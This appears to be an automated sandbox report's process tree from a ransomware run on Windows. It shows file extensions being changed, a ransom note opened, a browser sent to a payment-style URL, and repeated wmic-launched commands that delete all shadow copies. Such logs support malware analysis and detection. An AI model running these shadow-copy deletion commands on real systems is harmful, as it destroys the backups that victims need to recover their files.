-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1392
-
-
C:\Windows\system32\cmd.execmd /c "start http://5c90f04882607e909qwfekni.perages.cyou/qwfekni^&1^&37903891^&79^&377^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://5c90f04882607e909qwfekni.perages.cyou/qwfekni&1&37903891&79&377&123⤵
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1804 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2124
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1804 CREDAT:209945 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2000
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2360
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2136
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2384
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2368
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2092
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2436
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2160
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2376
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2652
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2676
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2668
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2660
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2748
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2840